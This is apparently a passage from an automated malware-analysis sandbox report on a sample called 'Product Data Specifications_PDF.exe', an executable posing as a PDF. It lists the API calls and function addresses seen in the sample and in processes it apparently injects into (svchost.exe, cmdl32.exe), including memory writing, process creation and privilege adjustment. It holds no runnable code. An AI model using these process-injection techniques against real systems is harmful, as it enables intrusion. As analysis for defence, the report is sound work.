            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E339B0 NtGetContextThread,LdrInitializeThunk,12_2_04E339B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32CF0 NtOpenProcess,12_2_04E32CF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32CC0 NtQueryVirtualMemory,12_2_04E32CC0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32C00 NtQueryInformationProcess,12_2_04E32C00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32DB0 NtEnumerateKey,12_2_04E32DB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32D00 NtSetInformationFile,12_2_04E32D00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32EA0 NtAdjustPrivilegesToken,12_2_04E32EA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32E30 NtWriteVirtualMemory,12_2_04E32E30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32FA0 NtQuerySection,12_2_04E32FA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32F90 NtProtectVirtualMemory,12_2_04E32F90
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32F60 NtCreateProcessEx,12_2_04E32F60
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32AB0 NtWaitForSingleObject,12_2_04E32AB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32B80 NtQueryInformationFile,12_2_04E32B80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E33090 NtSetValueKey,12_2_04E33090
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E33010 NtOpenDirectoryObject,12_2_04E33010
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E33D70 NtOpenThread,12_2_04E33D70
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E33D10 NtOpenProcessToken,12_2_04E33D10
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BB96E0 NtDeleteFile,12_2_02BB96E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BB9790 NtClose,12_2_02BB9790
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BB9480 NtCreateFile,12_2_02BB9480
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BB95F0 NtReadFile,12_2_02BB95F0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BB98F0 NtAllocateVirtualMemory,12_2_02BB98F0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_00431BE8
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00446313
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004096A06_2_004096A0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0042200C6_2_0042200C
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0041A2176_2_0041A217
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004122166_2_00412216
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0042435D6_2_0042435D
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004033C06_2_004033C0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044F4306_2_0044F430
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004125E86_2_004125E8
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044663B6_2_0044663B
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004138016_2_00413801
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0042096F6_2_0042096F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004129D06_2_004129D0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004119E36_2_004119E3
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0041C9AE6_2_0041C9AE
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0047EA6F6_2_0047EA6F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040FA106_2_0040FA10
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044EB5F6_2_0044EB5F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00423C816_2_00423C81
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00411E786_2_00411E78
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00442E0C6_2_00442E0C
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00420EC06_2_00420EC0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044CF176_2_0044CF17
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00444FD26_2_00444FD2
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_040026C86_2_040026C8
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_04005ED06_2_04005ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004188039_2_00418803
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004100439_2_00410043
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041003A9_2_0041003A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004028EA9_2_004028EA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004010F09_2_004010F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004169DE9_2_004169DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004169E39_2_004169E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041699C9_2_0041699C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004102639_2_00410263
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040E2E39_2_0040E2E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004022A09_2_004022A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042EED39_2_0042EED3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00402E809_2_00402E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FA3529_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F09_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037003E69_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E02749_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C02C09_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C81589_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036301009_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA1189_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F81CC9_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F41A29_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037001AA9_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D20009_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036407709_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036647509_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363C7C09_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365C6E09_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036405359_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037005919_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F24469_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E44209_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EE4F69_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FAB409_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F6BD79_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA809_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036569629_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A09_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370A9A69_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364A8409_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036428409_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E8F09_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036268B89_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4F409_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03682F289_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660F309_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E2F309_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364CFE09_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632FC89_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BEFA09_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640E599_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FEE269_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FEEDB9_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03652E909_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FCE939_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364AD009_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DCD1F9_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363ADE09_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03658DBF9_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640C009_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630CF29_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0CB59_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D34C9_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F132D9_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0368739A9_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C09_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A09_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367516C9_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F1729_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370B16B9_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364B1B09_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F70E99_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FF0E09_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF0CC9_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C09_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FF7B09_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036856309_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F16CC9_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F75719_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037095C39_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DD5B09_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036314609_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FF43F9_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFB769_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B5BF09_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367DBF99_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365FB809_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B3A6C9_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFA499_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F7A469_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EDAC69_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DDAAC9_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03685AA09_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E1AA39_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036499509_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B9509_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D59109_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AD8009_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036438E09_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFF099_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFFB19_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641F929_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03649EB09_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F7D739_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03643D409_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F1D5A9_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365FDC09_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B9C329_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFCF29_2_036FFCF2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EAE4F612_2_04EAE4F6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB244612_2_04EB2446
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA442012_2_04EA4420
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EC059112_2_04EC0591
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0053512_2_04E00535
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1C6E012_2_04E1C6E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DFC7C012_2_04DFC7C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0077012_2_04E00770
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E2475012_2_04E24750
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9200012_2_04E92000
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB81CC12_2_04EB81CC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EC01AA12_2_04EC01AA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB41A212_2_04EB41A2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E8815812_2_04E88158
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DF010012_2_04DF0100
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9A11812_2_04E9A118
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E802C012_2_04E802C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA027412_2_04EA0274
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EC03E612_2_04EC03E6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0E3F012_2_04E0E3F0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBA35212_2_04EBA352
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DF0CF212_2_04DF0CF2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA0CB512_2_04EA0CB5
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E00C0012_2_04E00C00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DFADE012_2_04DFADE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E18DBF12_2_04E18DBF
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0AD0012_2_04E0AD00
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9CD1F12_2_04E9CD1F
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBEEDB12_2_04EBEEDB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E12E9012_2_04E12E90
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBCE9312_2_04EBCE93
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E00E5912_2_04E00E59
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBEE2612_2_04EBEE26
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0CFE012_2_04E0CFE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DF2FC812_2_04DF2FC8
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E7EFA012_2_04E7EFA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E74F4012_2_04E74F40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E42F2812_2_04E42F28
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E20F3012_2_04E20F30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA2F3012_2_04EA2F30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E2E8F012_2_04E2E8F0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DE68B812_2_04DE68B8
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0A84012_2_04E0A840
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0284012_2_04E02840
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E029A012_2_04E029A0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04ECA9A612_2_04ECA9A6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1696212_2_04E16962
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DFEA8012_2_04DFEA80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB6BD712_2_04EB6BD7
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBAB4012_2_04EBAB40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DF146012_2_04DF1460
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBF43F12_2_04EBF43F
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EC95C312_2_04EC95C3
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9D5B012_2_04E9D5B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB757112_2_04EB7571
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB16CC12_2_04EB16CC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E4563012_2_04E45630
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBF7B012_2_04EBF7B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB70E912_2_04EB70E9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBF0E012_2_04EBF0E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E070C012_2_04E070C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EAF0CC12_2_04EAF0CC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0B1B012_2_04E0B1B0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04ECB16B12_2_04ECB16B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E3516C12_2_04E3516C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DEF17212_2_04DEF172
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA12ED12_2_04EA12ED
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1B2C012_2_04E1B2C0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E052A012_2_04E052A0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E4739A12_2_04E4739A
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DED34C12_2_04DED34C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB132D12_2_04EB132D
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFCF212_2_04EBFCF2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E79C3212_2_04E79C32
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1FDC012_2_04E1FDC0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB7D7312_2_04EB7D73
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E03D4012_2_04E03D40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB1D5A12_2_04EB1D5A
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E09EB012_2_04E09EB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFFB112_2_04EBFFB1
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E01F9212_2_04E01F92
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFF0912_2_04EBFF09
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E038E012_2_04E038E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E6D80012_2_04E6D800
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0995012_2_04E09950
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1B95012_2_04E1B950
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9591012_2_04E95910
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EADAC612_2_04EADAC6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E45AA012_2_04E45AA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9DAAC12_2_04E9DAAC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA1AA312_2_04EA1AA3
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E73A6C12_2_04E73A6C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFA4912_2_04EBFA49
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB7A4612_2_04EB7A46
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E75BF012_2_04E75BF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E3DBF912_2_04E3DBF9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1FB8012_2_04E1FB80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFB7612_2_04EBFB76
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA202012_2_02BA2020
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9CF3712_2_02B9CF37
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9CF4012_2_02B9CF40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9B1E012_2_02B9B1E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9D16012_2_02B9D160
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA570012_2_02BA5700
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA389912_2_02BA3899
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA38E012_2_02BA38E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA38DB12_2_02BA38DB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BBBDD012_2_02BBBDD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E42312_2_04C1E423
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E7BC12_2_04C1E7BC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E30612_2_04C1E306
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1D82812_2_04C1D828
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E94D12_2_04C1E94D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 277 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04E6EA12 appears 86 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04E35130 appears 58 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04E47E54 appears 111 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04DEB970 appears 277 times
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: String function: 04E7F290 appears 105 times
            Source: Product Data Specifications_PDF.exe, 00000006.00000003.1378998352.000000000490D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product Data Specifications_PDF.exe
